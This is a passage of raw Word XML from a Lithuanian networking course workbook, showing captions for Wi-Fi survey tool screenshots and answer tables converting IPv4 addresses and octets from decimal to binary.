        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">av. </w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ekahau Heatmapper programos rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C21323" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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0D64E15C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72265060" w14:textId="5A647415" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="004F0A0D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AC62F9B" wp14:editId="726D8536">
            <wp:extent cx="5680710" cy="2854325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="27" name="Paveikslėlis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27"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5680710" cy="2854325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E66E6F" w14:textId="4B5AFF81" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00E1078C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. inSSIDer 2.0 programos vaizdas. Signalo stiprumo fiksavimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D276008" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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0A9BE63B" w14:textId="2BBBA7FE" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279E7352" w14:textId="77777777" w:rsidR="00F71A65" w:rsidRPr="005A5C28" w:rsidRDefault="00F71A65" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5003A39F" w14:textId="77777777" w:rsidR="000016C4" w:rsidRPr="005A5C28" w:rsidRDefault="000016C4"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8 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3A8F7" w14:textId="18D5289E" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3815"/>
        <w:gridCol w:w="6100"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="51B677E0" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="531"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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4960976"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Dešimtainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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AF5C5EA"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Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="108D9418" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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21AC5B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">192 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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DE130D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">11000000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="33B6A840" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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77234E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">168 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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921EDB" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">10101000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="07535071" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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618049" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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832C9D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">00001010 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="23B98889" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="385"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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41B005" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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0A6B0C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="418669AD" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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B7B169" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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1DC11D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00000010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7D91BFA5" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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90DA27" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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0DEEDF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>00111000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="30C7FE94" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="192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720697" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="307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73AD31" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>01000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="037E3C13" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E8A026" w14:textId="77777777" w:rsidR="009C1B1D" w:rsidRPr="005A5C28" w:rsidRDefault="009C1B1D"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9 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45882E" w14:textId="28787705" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="113" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2897"/>
        <w:gridCol w:w="7018"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5352BC05" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="531"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="146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5862B0C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Dešimtainis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="353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72E3923" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Dvejetainis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="37AADFED" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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03F086" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.10.10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="353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2EFCF4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">11000000.10101000.00001010.00001010 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="07BAD6F9" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5D6549" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">209.165.200.229 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="353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03615B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11010001.10100101.11001000.11100101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5E4A1BC4" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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D5CC0D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.18.183 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="353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01CE0A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
